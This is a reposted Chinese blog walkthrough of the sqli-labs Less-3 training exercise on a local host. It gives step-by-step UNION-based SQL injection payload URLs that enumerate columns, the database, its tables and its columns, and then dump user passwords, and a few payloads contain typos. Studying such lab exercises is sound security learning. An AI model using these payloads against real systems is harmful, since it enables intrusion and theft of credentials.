标签：127.0 Less 0.1 id sql libs 对应 select less3

1、首先对sql的注入语句类型，进行判断，发现当输入数值时，不发生报错，当有单引号时，有错误进行。
sql语句的猜测：
select * from 。。 where id=（‘’）
当自己添加‘）进行闭合时，发现整体式子依然成立
说明自己的sql 语句的大致含义正确
2、判断对应的注入点的个数
http://127.0.0.1/Less-3/?id=2’) order by 1、2、3–+
当出现4的时候，发现错误，所以对应的列数共有3列
3、查找对应的注入点的位置
http://127.0.0.1/Less-3/?id=2‘) union select 1,2,3 --+
得到对应的注入点处是对应的2，3的位置
所以在2，3处进行大致的勘测
4、首先判断对应的数据库，查看是否可以使用对应的查看函数
http://127.0.0.1/Less-3/?id=-2’) union select 1,version(),database() --+
查找到对应的数据库版本是5.0以上，所以用数据库中相关的表进行整体的应用
http://127.0.0.1/Less-3/?id=-2’) union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema =database --+
进而查找到对应数据库中，所含有的所有的表
5、找到类似于密码的对应表，将其内容进行全部提取
http://127.0.0.1/Less-3/?id=-2’) union select 1,version(),group_concat(column_name) from information_schema.columns where table_schema =database and table_name=‘users’–+
进而，获取相关表的所有列名

6、最后提取所有用户的相关的信息密码数据
http://127.0.0.1/Less-3/?id=-2’) union select 1,version(),group_concat(id,username,password) from secrity.users --+
将对应密码取出来

标签：127.0,Less,0.1,id,sql,libs,对应,select,less3
来源： https://blog.csdn.net/weixin_45837168/article/details/122541823

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。